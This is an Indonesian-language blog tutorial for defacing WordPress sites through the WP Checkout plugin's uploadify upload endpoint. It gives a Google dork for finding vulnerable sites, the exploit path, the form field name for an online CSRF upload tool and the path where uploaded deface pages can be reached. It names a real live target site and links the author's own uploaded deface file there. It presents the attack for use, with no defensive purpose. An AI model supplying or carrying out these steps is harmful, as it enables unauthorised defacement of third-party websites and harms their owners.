Deface Poc WordPress Plugins WP Checkout

 



Ok , Back lagi , kali ini gw akan nge-share tutorial deface metode WordPress Plugins WP Checkout with Csrf


Langsung aja kita ke tutorialnya, pertama-tama kita siapkan bahan-bahan nya terlebih dahulu


Bahan-bahan:


Dork : inurl:/wp-content/plugins/wp-checkout


Exploit : /wp-content/plugins/wp-checkout/vendors/uploadify/upload.php 


Akses File : /wp-content/uploads/wp-checkout/uploadify/namafile pas selesai up sc 


Csrf Online : Postfile nya Filedata 


SC Depes Kalian Ext html or shtml 


Oghey gw rasa itu dh cukup kali y, langsung aja ke pembahasan nya 



Pertama-tama kalian ngedork di google dulu 






Cari web yg sekira nya Vuln, dan masukkan Exploit nya, Ciri2 Vuln? Blank Putih! , karena gw udh ada live target jadi gosah capek2 ngedork lagi langsung aja kita pake live target nya , Live target? http://graphicsource.ca/wp-content/plugins/wp-checkout/vendors/uploadify/upload.php 


Buka dan Blank Putih! 





Langsung aja kita ke Csrf Online nya , masukkan site beserta Exploit nya dengan postfile Filedata lalu klik Lock Target 



Kalau udh pilih SC Depes Kalian dan Up, jika berhasil akan seperti ini 




Cara akses file nya? site.com//wp-content/uploads/wp-checkout/uploadify/namafile pas selesai up sc 


Kalau punya gw gini ,  http://graphicsource.ca/wp-content/uploads/wp-checkout/uploadify/1624031435.shtml




Done , ok itu saja kurang lebih nya minta maaf 


#Thanks To All Member Team

أحدث أقدم